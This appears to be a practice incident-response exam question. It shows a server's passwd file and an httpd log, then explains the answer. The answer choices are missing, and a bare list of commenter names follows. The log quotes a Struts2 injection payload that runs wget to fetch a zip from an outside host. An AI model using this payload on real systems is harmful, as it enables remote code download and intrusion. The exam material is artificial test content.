An incident response team member is triaging a Linux server. The output is shown below:
$ cat /etc/passwd
root:x:0:0::/:/bin/zsh
bin:x:1:1::/:/usr/bin/nologin
daemon:x:2:2::/:/usr/bin/nologin
mail:x:8:12::/var/spool/mail:/usr/bin/nologin
http:x:33:33::/srv/http:/bin/bash
nobody:x:65534:65534:Nobody:/:/usr/bin/nologin
git:x:972:972:git daemon user:/:/usr/bin/git-shell
$ cat /var/log/httpd
at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208)
at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316)
at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami)
at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.
at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartRequest.java:423)
Which of the following is the adversary most likely trying to do?
The log output indicates an attempt to execute a command via an unsecured service account, specifically using a wget command to download a file from an external source. This suggests that the adversary is trying to exploit a vulnerability in the web server to run unauthorized commands, which is a common technique for gaining a foothold or further compromising the system. The presence of wget http://grohl.ve.da/tmp/brkgtr.zip indicates an attempt to download and possibly execute a malicious payload.
Frederica
3 months agoGianna
3 months agoRoxane
3 months agoFrank
4 months agoGussie
4 months agoJettie
4 months agoEvangelina
4 months agoMiesha
4 months agoGlynda
5 months agoAmira
5 months agoChandra
5 months agoMose
5 months agoCarri
5 months agoTyisha
5 months agoBuck
5 months agoWava
1 year agoTherese
1 year agoKayleigh
1 year agoReena
1 year agoTrinidad
1 year agoShakira
1 year agoJules
1 year agoTresa
1 year agoRaelene
1 year agoSocorro
1 year agoFiliberto
1 year agoLindsey
1 year agoOzell
1 year agoAlona
1 year agoDaron
1 year agoRenay
1 year agoNa
1 year agoPearlene
1 year agoYuki
1 year agoLaquita
1 year agoLouann
1 year agoTrinidad
1 year agoEun
1 year agoDelfina
1 year agoAvery
1 year agoSharmaine
1 year agoAmina
1 year agoCornell
1 year agoKaycee
1 year ago